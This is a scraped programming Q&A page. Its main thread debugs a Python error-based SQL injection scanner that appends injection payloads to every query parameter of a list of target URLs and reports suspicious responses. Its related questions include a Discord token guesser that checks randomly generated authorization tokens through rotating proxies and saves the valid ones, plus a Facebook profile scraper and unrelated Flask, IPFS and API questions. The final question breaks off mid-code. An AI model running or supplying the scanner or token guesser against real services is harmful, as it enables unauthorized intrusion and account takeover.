Unable to remove newlines from list in Python scanner

I am trying to create a simple error-based SQLi scanner that tacks some common SQLi payloads onto the ends of query values in URLs. I have this working when providing a single URL, but I cannot get it to work properly when passing a file of URLs. The lists of URLs with the payloads come back, but I have been unable to figure out how to remove the '\n' at the end of each URL in the list so that I can request each URL.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
from urllib.parse import urlparse, urlunparse, quote_plus

print('\t SQLiScan')

# arguments
def getArgs():
    parser = argparse.ArgumentParser(description='Error-based SQLi scan')
    parser.add_argument('-l', '--list', help='List of target urls')
    parser.add_argument('-u', '--url', help='Target url')
    args = parser.parse_args()
    return args

# Load file of urls for scan
def loadFile(file):
    target_urls = []
    with open(args.list, 'r') as f:
        for url in f.readlines():
            url = url.rstrip('\n')
            target_urls.append(url)
    return target_urls

# Append payloads to urls
def appendPayload(url):
    result = []
    payloads = ["1'", '1"', "[1]", "[]=1", "1`", "1/*'*/", "1/*!1111'*/",
                "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='",
                "'1 or 1='1"]
    parsed = urlparse(url)
    queries = parsed.query.split('&')
    for payload in payloads:
        new_query = "&".join(["{}{}".format(query, payload) for query in queries])
        parsed = parsed._replace(query=new_query)
        result.append(urlunparse(parsed))
    request_url = "\n".join(map(str, result))
    request_url = quote_plus(request_url, safe='\n:/')
    return request_url

if __name__ == '__main__':
    args = getArgs()
    url = args.url
    urls = loadFile(args.list)
    appendPayload(url)
This returns a list like this:
['https://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%22\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B1%5D\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B%5D%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%60\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%211111%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27%7C%7C%27asd%27%7C%7C%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27+or+%271%27%3D%271\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211+or+1%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%27or%27%27%3D%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%271+or+1%3D%271']
After updating the code, I am still having difficulty requesting each URL properly:
# Load file of urls for scan
def loadFile(file):
    target_urls = []
    with open(args.list, 'r') as f:
        for url in f.readlines():
            url = url.rstrip('\n')
            target_urls.append(url)
    return target_urls

# Append payloads to urls
def appendPayload(url):
    result = []
    payloads = ["1'", '1"', "[1]", "[]=1", "1`", "1/*'*/", "1/*!1111'*/",
                "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='",
                "'1 or 1='1"]
    parsed = urlparse(url)
    queries = parsed.query.split('&')
    for payload in payloads:
        new_query = "&".join(["{}{}".format(query, payload) for query in queries])
        parsed = parsed._replace(query=new_query)
        result.append(urlunparse(parsed))
    # request_url = ",".join(map(str, result))
    # result = [quote_plus(x, safe='\n:/') for x in result]
    print(result)
    return result

if __name__ == '__main__':
    args = getArgs()
    url = args.url
    urls = loadFile(args.list)
    for url in urls:
        request = requests.get(appendPayload(url))
This is returning:
requests.exceptions.InvalidSchema: No connection adapters were found for '["http://exampe.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1"\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[1]\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[]=1\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1`\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*!1111\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'||\'asd\'||\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\' or \'1\'=\'1", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1 or 1=1\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'or\'\'=\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'1 or 1=\'1"]'
It seems like it may have to do with the quotes appearing in front of the https: in some of the lines.
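A note on the error above: appendPayload now returns a list, but the loop passes the whole list to requests.get, which stringifies it; that is where the "No connection adapters were found" message comes from. A minimal sketch of requesting each generated URL individually, assuming the functions defined above:

if __name__ == '__main__':
    args = getArgs()
    for url in loadFile(args.list):
        # appendPayload returns a list of payload URLs; request each one separately
        for target in appendPayload(url):
            response = requests.get(target)
            print(response.status_code, target)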
Update:
After much trying, I finally got this working the way I was looking for.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
import sys
import time
from urllib.parse import urlparse, urlunparse, quote_plus
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

print('\t SQLiScan')

# arguments
def getArgs():
    parser = argparse.ArgumentParser(description='Error-based SQLi scan')
    parser.add_argument('-l', '--list', help='List of target urls')
    parser.add_argument('-u', '--url', help='Target url')
    args = parser.parse_args()
    return args

# Load file of urls for scan
def loadFile(file):
    target_urls = []
    with open(args.list, 'r') as f:
        for url in f.readlines():
            url = url.rstrip('\n')
            target_urls.append(url)
    return target_urls

# Append payloads to urls
def appendPayload(data):
    targets = []
    encoded = []
    payloads = ["1'", '1"', "[1]", "[]=1", "1`", "1/*'*/", "1/*!1111'*/",
                "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='",
                "'1 or 1='1"]
    for url in data:
        parsed_url = urlparse(url)
        url_queries = parsed_url.query.split("&")
        for payload in payloads:
            new_query = "&".join(["{}{}".format(query, payload) for query in url_queries])
            parsed = parsed_url._replace(query=new_query)
            targets.append(urlunparse(parsed))
    for target in targets:
        encode = quote_plus(target, safe='\n:/')
        encoded.append(encode)
    return encoded

args = getArgs()
data = loadFile(args.list)
targets = appendPayload(data)
counter = 0
for target in targets:
    counter += 1
    print(f'\r{counter} Requests sent', end='', flush=True)
    r = requests.get(target, verify=False)
    if r.status_code == 500 or r.status_code == 302:
        print(r.status_code, " ", target)
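ThreadPoolExecutor is imported above but never used. As a hedged sketch (not part of the original script), the request loop could be parallelized like this; the scan helper and the worker count are illustrative:

def scan(target):
    # one GET per payload URL, matching the loop above
    r = requests.get(target, verify=False)
    if r.status_code == 500 or r.status_code == 302:
        print(r.status_code, " ", target)

# send the requests concurrently instead of one at a time
with ThreadPoolExecutor(max_workers=10) as executor:
    list(executor.map(scan, targets))  # iterate so worker exceptions are not silently dropped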

Related

Error: proxy = next(proxy_pool) StopIteration

I am trying to run a script, and it has a standard URL for proxies which allows the script to run fine. Once I add my own proxy URL, I get the error Error: proxy = next(proxy_pool) StopIteration. My URL is in another file, and I can also link that if needed.
The code is below; if anyone can help, that would be great.
import string
import os
import random  # needed for random.choice below (missing from the original snippet)
import requests
import proxygen
from itertools import cycle
import base64
from random import randint

N = input("How many tokens : ")
count = 0
current_path = os.path.dirname(os.path.realpath(__file__))
url = "https://discordapp.com/api/v6/users/@me/library"

while int(count) < int(N):
    tokens = []
    base64_string = "=="
    while base64_string.find("==") != -1:
        sample_string = str(randint(000000000000000000, 999999999999999999))
        sample_string_bytes = sample_string.encode("ascii")
        base64_bytes = base64.b64encode(sample_string_bytes)
        base64_string = base64_bytes.decode("ascii")
    else:
        token = base64_string + "." + random.choice(string.ascii_letters).upper() + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(5)) + "." + ''.join(
            random.choice(string.ascii_letters + string.digits) for _ in range(27))
        count += 1
        tokens.append(token)
    proxies = proxygen.get_proxies()
    proxy_pool = cycle(proxies)
    for token in tokens:
        proxy = next(proxy_pool)
        header = {
            "Content-Type": "application/json",
            "authorization": token
        }
        try:
            r = requests.get(url, headers=header, proxies={'https': "http://" + proxy})
            print(r.text)
            print(token)
            if r.status_code == 200:
                print(u"\u001b[32;1m[+] Token Works!\u001b[0m")
                f = open(current_path + "/" + "workingtokens.txt", "a")
                f.write(token + "\n")
            elif "rate limited." in r.text:
                print("[-] You are being rate limited.")
            else:
                print(u"\u001b[31m[-] Invalid Token.\u001b[0m")
        except requests.exceptions.ProxyError:
            print("BAD PROXY")
            tokens.remove(token)
Try this code for get_proxies()
import requests

def get_proxies():
    # in your example missing schema
    url = 'https://proxy.link/list/get/5691264d3b19a600feef69dc3a27368d'
    response = requests.get(url)
    raw = response.text.split('\n')
    proxies = set(raw)
    return proxies
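For context on the error itself: next() on a cycle() built from an empty iterable raises StopIteration, so the exception usually means get_proxies() came back empty (for example because the proxy list request failed). A hedged guard, assuming the get_proxies() above:

from itertools import cycle

proxies = get_proxies()
# drop blank entries that split('\n') can leave behind
proxies = {p.strip() for p in proxies if p.strip()}
if not proxies:
    raise SystemExit("No proxies returned - check the proxy list URL")
proxy_pool = cycle(proxies)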

JSONDecodeError: Extra data: line 1 column 8 (char 7)

I've followed a tutorial to scrape a Facebook profile and I keep getting this error:
JSONDecodeError: Extra data: line 1 column 8 (char 7)
Does anyone know what the problem might be?
Here is my python script:
def get_bs(session, url):
    # Makes a GET request using the given Session object and returns a BeautifulSoup object.
    r = None
    while True:
        r = session.get(url)
        if r.ok:
            break
    return BeautifulSoup(r.text, 'lxml')
# To login
def make_login(session, base_url, credentials):
    # Returns a Session object logged in with credentials.
    login_form_url = '/login/device-based/regular/login/?refsrc=https%3A'\
        '%2F%2Fmobile.facebook.com%2Flogin%2Fdevice-based%2Fedit-user%2F&lwv=100'
    params = {'email': credentials['email'], 'pass': credentials['pass']}
    while True:
        time.sleep(3)
        logged_request = session.post(base_url+login_form_url, data=params)
        if logged_request.ok:
            logging.info('[*] Logged in.')
            break

# Crawling FB
def crawl_profile(session, base_url, profile_url, post_limit):
    # Goes to profile URL, crawls it and extracts posts URLs.
    profile_bs = get_bs(session, profile_url)
    n_scraped_posts = 0
    scraped_posts = list()
    posts_id = None
    while n_scraped_posts < post_limit:
        try:
            posts_id = 'recent'
            posts = profile_bs.find('div', id=posts_id).div.div.contents
        except Exception:
            posts_id = 'structured_composer_async_container'
            posts = profile_bs.find('div', id=posts_id).div.div.contents
        posts_urls = [a['href'] for a in profile_bs.find_all('a', text='Full Story')]
        for post_url in posts_urls:
            # print(post_url)
            try:
                post_data = scrape_post(session, base_url, post_url)
                scraped_posts.append(post_data)
            except Exception as e:
                logging.info('Error: {}'.format(e))
            n_scraped_posts += 1
            if posts_completed(scraped_posts, post_limit):
                break
        show_more_posts_url = None
        if not posts_completed(scraped_posts, post_limit):
            show_more_posts_url = profile_bs.find('div', id=posts_id).next_sibling.a['href']
            profile_bs = get_bs(session, base_url+show_more_posts_url)
            time.sleep(3)
        else:
            break
    return scraped_posts
def get_bs(session, url):
    # Makes a GET request using the given Session object and returns a BeautifulSoup object.
    r = None
    while True:
        r = session.get(url)
        time.sleep(3)
        if r.ok:
            break
    return BeautifulSoup(r.text, 'lxml')
# Scraping FB
def scrape_post(session, base_url, post_url):
    # Goes to post URL and extracts post data.
    post_data = OrderedDict()
    post_bs = get_bs(session, base_url+post_url)
    time.sleep(5)
    # Here we populate the OrderedDict object
    post_data['url'] = post_url
    # Find Post main element
    try:
        post_text_element = post_bs.find('div', id='u_0_0').div
        string_groups = [p.strings for p in post_text_element.find_all('p')]
        strings = [repr(string) for group in string_groups for string in group]
        post_data['text'] = strings
    except Exception:
        post_data['text'] = []
    # Extract post media URL
    try:
        post_data['media_url'] = post_bs.find('div', id='u_0_0').find('a')['href']
    except Exception:
        post_data['media_url'] = ''
    # Extract remaining data
    try:
        post_data['comments'] = extract_comments(session, base_url, post_bs, post_url)
    except Exception:
        post_data['comments'] = []
    return dict(post_data)
# Function for profile URL and credentials for FB
def json_to_obj(filename):
    # Extracts data from JSON file and saves it on Python object
    obj = None
    with open(filename) as json_file:
        obj = json.loads(json_file.read())
    return obj

def save_data(data):
    # Converts data to JSON.
    with open('profile_posts_data.json', 'w') as json_file:
        json.dump(data, json_file, indent=4)
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    base_url = 'https://mobile.facebook.com'
    session = requests.session()
    # Extracts credentials for the login and all of the profiles URL to scrape
    credentials = json_to_obj('credentials.json')
    profiles_urls = json_to_obj('profiles_urls.json')
    make_login(session, base_url, credentials)
    posts_data = None
    for profile_url in profiles_urls:
        posts_data = crawl_profile(session, base_url, profile_url, 25)
    logging.info('[!] Scraping finished. Total: {}'.format(len(posts_data)))
    logging.info('[!] Saving.')
    save_data(posts_data)
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    base_url = 'https://mobile.facebook.com'
    session = requests.session()
    # Extracts credentials for the login and all of the profiles URL to scrape
    credentials = json_to_obj(r"C:\Users\E7450\Desktop\GIS702\FBScrapping\credentials.json")
    profiles_urls = json_to_obj(r"C:\Users\E7450\Desktop\GIS702\FBScrapping\profiles_urls.json")
    make_login(session, base_url, credentials)
    posts_data = None
    for profile_url in profiles_urls:
        posts_data = crawl_profile(session, base_url, profile_url, 25)
    logging.info('[!] Scraping finished. Total: {}'.format(len(posts_data)))
    logging.info('[!] Saving.')
    save_data(posts_data)
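No answer is included in this excerpt, but as a hedged note: json.loads raises "Extra data" when the text contains something after the first complete JSON value (for example two JSON documents concatenated in one file). A small sketch for inspecting what json_to_obj is actually parsing; the credentials.json name is taken from the question:

import json

with open('credentials.json') as f:  # or profiles_urls.json, whichever json_to_obj is loading
    raw = f.read()

decoder = json.JSONDecoder()
obj, end = decoder.raw_decode(raw)  # parse only the first JSON value
print('first JSON value ends at char', end)
print('trailing data:', repr(raw[end:end + 40]))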

Cannot Process decoded Image files, Flask, OpenCV

I am receiving a bunch of images in the Flask app, sent via the client file.
client.py
# Generate the parallel requests based on the ThreadPool Executor
from concurrent.futures import ThreadPoolExecutor as PoolExecutor
import sys
import time
import glob
import requests
import threading
import uuid
import base64
import json
import os

# send http request
def call_object_detection_service(image):
    try:
        url = str(sys.argv[2])
        data = {}
        # generate uuid for image
        id = uuid.uuid5(uuid.NAMESPACE_OID, image)
        # Encode image into base64 string
        with open(image, 'rb') as image_file:
            data['image'] = base64.b64encode(image_file.read()).decode('utf-8')
        data['id'] = str(id)
        headers = {'Content-Type': 'application/json'}
        response = requests.post(url, json=json.dumps(data), headers=headers)
        if response.ok:
            output = "Thread : {}, input image: {}, output:{}".format(threading.current_thread().getName(),
                                                                      image, response.text)
            print(output)
        else:
            print("Error, response status:{}".format(response))
    except Exception as e:
        print("Exception in webservice call: {}".format(e))

# gets list of all images path from the input folder
def get_images_to_be_processed(input_folder):
    images = []
    for image_file in glob.iglob(input_folder + "*.jpg"):
        images.append(image_file)
    return images

def main():
    # provide arguments -> input folder, url, number of workers
    if len(sys.argv) != 4:
        raise ValueError("Arguments list is wrong. Please use the following format: {} {} {} {}".
                         format("python iWebLens_client.py", "<input_folder>", "<URL>", "<number_of_workers>"))
    input_folder = os.path.join(sys.argv[1], "")
    images = get_images_to_be_processed(input_folder)
    num_images = len(images)
    num_workers = int(sys.argv[3])
    start_time = time.time()
    # create a worker thread to invoke the requests in parallel
    with PoolExecutor(max_workers=num_workers) as executor:
        for _ in executor.map(call_object_detection_service, images):
            pass
    # elapsed_time = time.time() - start_time
    # print("Total time spent: {} average response time: {}".format(elapsed_time, elapsed_time/num_images))

if __name__ == "__main__":
    main()
I decode them like so
Flask App
app = Flask(__name__)
c = 1

@app.route('/api/object_detection', methods=['POST'])
def main():
    global c
    try:
        data = request.get_json(force=True)
        uid = data.get('id')
        image = data.get('image')
        print(image)
        im = base64.decodebytes(image)
        with open("image{}".format(c), 'wb') as f:
            f.write(im)
        c += 1
        for l in range(128):
            img = cv2.imread("image{}".format(l), cv2.IMREAD_ANYCOLOR)
            # load the neural net. Should be local to this method as its multi-threaded endpoint
            nets = load_model(CFG, Weights)
            s = do_prediction(img, nets, Lables)
        return jsonify(s)
    except Exception as e:
        print(e)

if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=True, threaded=True)
This creates the image files with different sizes, but I cannot view them in an image viewer. The files being received are JPG files. Ignoring that, I went ahead with the processing and I get:
TypeError: The view function for 'main' did not return a valid response. The function either returned None or ended without a return statement.
Incorrect padding
Incorrect padding
[INFO] loading YOLO from disk...
'NoneType' object has no attribute 'shape'
Images are being sent like this.
python iWebLens_client.py inputfolder/ http://192.168.29.75:5000/api/object_detection 4
The images are being received like this.
b'"{\\"image\\": \\"/9j/4AAQSkZJRgABAQEASABIAAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA......fiU05tQopHNf//Z\\", \\"id\\": \\"e3ad9809-b84c-57f1-bd03-a54e25c59bcc\\"}"'
I am thinking I need to decode('utf-8') this, but don't know how.
Currently, you are double-encoding the data on the client side. Within requests, the argument passed via json= is already converted to JSON.
Just pass the dict on as the json parameter.
def call_object_detection_service(image):
    try:
        url = str(sys.argv[2])
        data = {}
        # generate uuid for image
        id = uuid.uuid5(uuid.NAMESPACE_OID, image)
        # Encode image into base64 string
        with open(image, 'rb') as image_file:
            data['image'] = base64.b64encode(image_file.read()).decode('utf-8')
        data['id'] = str(id)
        headers = {'Content-Type': 'application/json'}
        # HERE IS THE CHANGE !!!
        response = requests.post(url, json=data, headers=headers)
        if response.ok:
            output = "Thread : {}, input image: {}, output:{}".format(
                threading.current_thread().getName(),
                image,
                response.text
            )
            print(output)
        else:
            print("Error, response status:{}".format(response))
    except Exception as e:
        print("Exception in webservice call: {}".format(e))
The data can now be received on the server as JSON and extracted into a dict.
@app.route('/api/object_detection', methods=['POST'])
def main():
    data = request.get_json(force=True)
    uid = data.get('id')
    image = data.get('image')
    # ... decode the base64 data here ...
    return jsonify(message='done')
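As a hedged follow-up (not part of the original answer), the "... decode the base64 data here ..." step can be done in memory instead of writing image files to disk; this sketch assumes numpy and cv2 are available in the Flask app:

import base64
import cv2
import numpy as np

def decode_image(image_b64):
    # base64 string -> raw JPEG bytes -> numpy buffer -> BGR image for OpenCV
    img_bytes = base64.b64decode(image_b64)
    buffer = np.frombuffer(img_bytes, dtype=np.uint8)
    return cv2.imdecode(buffer, cv2.IMREAD_COLOR)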

How Do You Write Files to IPFS via the HTTP API in Python

Could someone demonstrate writing a file to IPFS via the HTTP API (/files/write) and Python?
My code is getting messier every time I modify it.
https://pastebin.com/W9eNz1Pb
import urllib.request
import urllib.parse

def api(*argv, **kwargs):
    url = "http://127.0.0.1:5001/api/v0/"
    for arg in argv:
        arg = arg.replace(" ", "/")
        if arg[:-1] != "/":
            arg += "/"
        url += arg
    url = url[0:-1]
    if kwargs:
        url += "?"
        for val in kwargs:
            if val != "post":
                url = url + val + "=" + kwargs[val] + "&"
        url = url[0:-1]
    print(url)
    try:
        if "post" in kwargs:
            print("POST DATA")
            with urllib.request.urlopen(url=url, data=urllib.parse.urlencode(kwargs["post"]).encode("ascii")) as response:
                return response.read()
        else:
            with urllib.request.urlopen(url, timeout=300) as response:
                return response.read()
    except:
        return b"""{"ERROR": "CANNOT CONNECT TO IPFS!"}"""

class file(object):
    def __init__(self, p):
        self.p = p
        if self.p[0] != "/":
            self.p = "/" + self.p

    def read(self):
        return api("files", "read", arg=self.p).decode()

    def write(self, s, *argv):
        if argv:
            return api("files", "write", arg=self.p, offset=str(argv[0]), create="True", parents="True", post={"Data": s})
        else:
            return api("files", "write", arg=self.p, truncate="True", create="True", parents="True", post={"Data": s})
file.read() works perfectly. But file.write() is being a pain in the rear.
Here's a minimal example to write a file via the /files/write HTTP API in Python:
import requests
import urllib.parse

NODE = "http://localhost:5001"
FILE_PATH = "./example"  # path to file you're trying to add
MFS_PATH = "/example"    # mfs path you're trying to write to

response = requests.post(
    NODE + "/api/v0/files/write?arg=%s&create=true" % urllib.parse.quote(MFS_PATH),
    files={FILE_PATH: open(FILE_PATH, 'rb')})
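A brief, hedged note on checking the result: files/write generally returns an empty body on success, so the status code is the useful signal here. This sketch reuses the NODE, MFS_PATH, and FILE_PATH names defined above:

# raise on HTTP errors; a 200 with an empty body means the write succeeded
response.raise_for_status()
print("wrote", FILE_PATH, "to MFS path", MFS_PATH)

# read it back through the API to confirm
read_back = requests.post(NODE + "/api/v0/files/read?arg=%s" % urllib.parse.quote(MFS_PATH))
print(read_back.text)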
Make sure the ipfs daemon is running:
ipfs init
ipfs daemon
Your URL endpoint is wrong. If you check the documentation, for adding a file the URL should be:
url = "http://127.0.0.1:5001/api/v0/add"
Create a function to upload, so you can reuse this logic in other parts of your project:
def add_to_ipfs(filepath):
    from pathlib import Path
    import requests
    # rb means open in binary. read binary
    with Path(filepath).open("rb") as fp:
        image_binary = fp.read()
    # we need to make post request to this endpoint.
    url = "http://127.0.0.1:5001/api/v0/add"
    # check the response object
    response = requests.post(url, files={"file": image_binary})
    ipfs_hash = response.json()["Hash"]
    # "./img/myImage.png" -> "myImage.png" split by "/" into array, take the last element
    filename = filepath.split("/")[-1:][0]
    image_uri = f"https://ipfs.io/ipfs/{ipfs_hash}?filename={filename}"
    print("image uri on ipfs", image_uri)
    return image_uri
This is the response type from IPFS:
{
  "Bytes": "<int64>",
  "Hash": "<string>",
  "Name": "<string>",
  "Size": "<string>"
}
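As a quick usage sketch of the function above (the file path is just an illustrative example):

uri = add_to_ipfs("./img/myImage.png")
print(uri)  # e.g. https://ipfs.io/ipfs/<Hash>?filename=myImage.png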

python request urls parallel [duplicate]

This question already has an answer here:
How to send multiple http requests python
(1 answer)
Closed 6 years ago.
I created the following script to download images from an API endpoint, and it works as intended. The thing is that it is rather slow, as all the requests have to wait on each other. What is the correct way to keep the steps synchronous for each item I want to fetch, but run the individual items in parallel? This is for an online service called
servicem8
So what I hope to achieve is:
fetch all possible job ids => keep name/and other info
fetch name of the customer
fetch each attachment of a job
These three steps should be done for each job. So I could make things parallel for each job as they do not have to wait on each other.
Update:
What I do not understand is how to bundle the three calls per item, since it is only across items that I can run things in parallel. For example, when I want to
fetch item (fetch name => fetch description => fetch id)
it is the whole fetch item step that I want to run in parallel (see the sketch after the code below).
The current code I have is working but rather slow:
import requests
import dateutil.parser
import shutil
import os

user = "test@test.com"
passw = "test"

print("Read json")
url = "https://api.servicem8.com/api_1.0/job.json"
r = requests.get(url, auth=(user, passw))
print("finished reading jobs.json file")
scheduled_jobs = []
if r.status_code == 200:
    for item in r.json():
        scheduled_date = item['job_is_scheduled_until_stamp']
        try:
            parsed_date = dateutil.parser.parse(scheduled_date)
            if parsed_date.year == 2016:
                if parsed_date.month == 10:
                    if parsed_date.day == 10:
                        url_customer = "https://api.servicem8.com/api_1.0/Company/{}.json".format(item['company_uuid'])
                        c = requests.get(url_customer, auth=(user, passw))
                        cus_name = c.json()['name']
                        scheduled_jobs.append(
                            [item['uuid'], item['generated_job_id'], cus_name])
        except ValueError:
            pass

for job in scheduled_jobs:
    print("fetch for job {}".format(job))
    url = "https://api.servicem8.com/api_1.0/Attachment.json?%24filter=related_object_uuid%20eq%20{}".format(job[0])
    r = requests.get(url, auth=(user, passw))
    if r.json() == []:
        pass
    for attachment in r.json():
        if attachment['active'] == 1 and attachment['file_type'] != '.pdf':
            print("fetch for attachment {}".format(attachment))
            url_staff = "https://api.servicem8.com/api_1.0/Staff.json?%24filter=uuid%20eq%20{}".format(
                attachment['created_by_staff_uuid'])
            s = requests.get(url_staff, auth=(user, passw))
            for staff in s.json():
                tech = "{}_{}".format(staff['first'], staff['last'])
            url = "https://api.servicem8.com/api_1.0/Attachment/{}.file".format(attachment['uuid'])
            r = requests.get(url, auth=(user, passw), stream=True)
            if r.status_code == 200:
                creation_date = dateutil.parser.parse(
                    attachment['timestamp']).strftime("%d.%m.%y")
                if not os.path.exists(os.getcwd() + "/{}/{}".format(job[2], job[1])):
                    os.makedirs(os.getcwd() + "/{}/{}".format(job[2], job[1]))
                path = os.getcwd() + "/{}/{}/SC -O {} {}{}".format(
                    job[2], job[1], creation_date, tech.upper(), attachment['file_type'])
                print("writing file to path {}".format(path))
                with open(path, 'wb') as f:
                    r.raw.decode_content = True
                    shutil.copyfileobj(r.raw, f)
            else:
                print(r.text)
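Here is the hedged sketch referred to in the update above (not the author's eventual solution): each job's dependent calls stay sequential inside one worker function, and a thread pool runs the workers for different jobs concurrently. process_job and the worker count are illustrative, and the worker only counts attachments to keep the example short; it reuses user, passw, and scheduled_jobs from the script above.

from concurrent.futures import ThreadPoolExecutor
import requests

def process_job(job):
    # the dependent steps for one job stay in order inside this function
    job_uuid, job_id, customer = job
    url = ("https://api.servicem8.com/api_1.0/Attachment.json"
           "?%24filter=related_object_uuid%20eq%20{}".format(job_uuid))
    attachments = requests.get(url, auth=(user, passw)).json()
    return job_id, len(attachments)

# jobs do not depend on each other, so run them in parallel
with ThreadPoolExecutor(max_workers=8) as pool:
    for job_id, n_attachments in pool.map(process_job, scheduled_jobs):
        print("job {} has {} attachments".format(job_id, n_attachments))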
Update [14/10]
I updated the code in the following way with some of the hints given. Thanks a lot for that. The only thing left to optimize, I guess, is the attachment downloading, but it is working fine now. A funny thing I learned is that you cannot create a CON folder on a Windows machine :-) I did not know that.
I use pandas as well, just to try to avoid some loops over my list of dicts, but I am not sure it is the most performant approach. The longest part is actually reading in the full JSON files. I read them in fully because I could not find a way of telling the API to return only the jobs from September 2016. The API query filter seems to work on eq/lt/ht.
import requests
import dateutil.parser
import shutil
import os
import pandas as pd

user = ""
passw = ""
FOLDER = os.getcwd()
headers = {"Accept-Encoding": "gzip, deflate"}

import grequests

urls = [
    'https://api.servicem8.com/api_1.0/job.json',
    'https://api.servicem8.com/api_1.0/Attachment.json',
    'https://api.servicem8.com/api_1.0/Staff.json',
    'https://api.servicem8.com/api_1.0/Company.json'
]
# Create a set of unsent Requests:
print("Read json files")
rs = (grequests.get(u, auth=(user, passw), headers=headers) for u in urls)
# Send them all at the same time:
jobs, attachments, staffs, companies = grequests.map(rs)

# create dataframes
df_jobs = pd.DataFrame(jobs.json())
df_attachments = pd.DataFrame(attachments.json())
df_staffs = pd.DataFrame(staffs.json())
df_companies = pd.DataFrame(companies.json())

#url_customer = "https://api.servicem8.com/api_1.0/Company/{}.json".format(item['company_uuid'])
#c = requests.get(url_customer, auth=(user, passw))
#url = "https://api.servicem8.com/api_1.0/job.json"
#jobs = requests.get(url, auth=(user, passw), headers=headers)
#print("Reading attachments json")
#url = "https://api.servicem8.com/api_1.0/Attachment.json"
#attachments = requests.get(url, auth=(user, passw), headers=headers)
#print("Reading staff.json")
#url_staff = "https://api.servicem8.com/api_1.0/Staff.json"
#staffs = requests.get(url_staff, auth=(user, passw))

scheduled_jobs = []
if jobs.status_code == 200:
    print("finished reading json file")
    for job in jobs.json():
        scheduled_date = job['job_is_scheduled_until_stamp']
        try:
            parsed_date = dateutil.parser.parse(scheduled_date)
            if parsed_date.year == 2016:
                if parsed_date.month == 9:
                    cus_name = df_companies[df_companies.uuid == job['company_uuid']].iloc[0]['name'].upper()
                    cus_name = cus_name.replace('/', '')
                    scheduled_jobs.append([job['uuid'], job['generated_job_id'], cus_name])
        except ValueError:
            pass
print("{} jobs to fetch".format(len(scheduled_jobs)))

for job in scheduled_jobs:
    print("fetch for job attachments {}".format(job))
    #url = "https://api.servicem8.com/api_1.0/Attachment.json?%24filter=related_object_uuid%20eq%20{}".format(job[0])
    if attachments == []:
        pass
    for attachment in attachments.json():
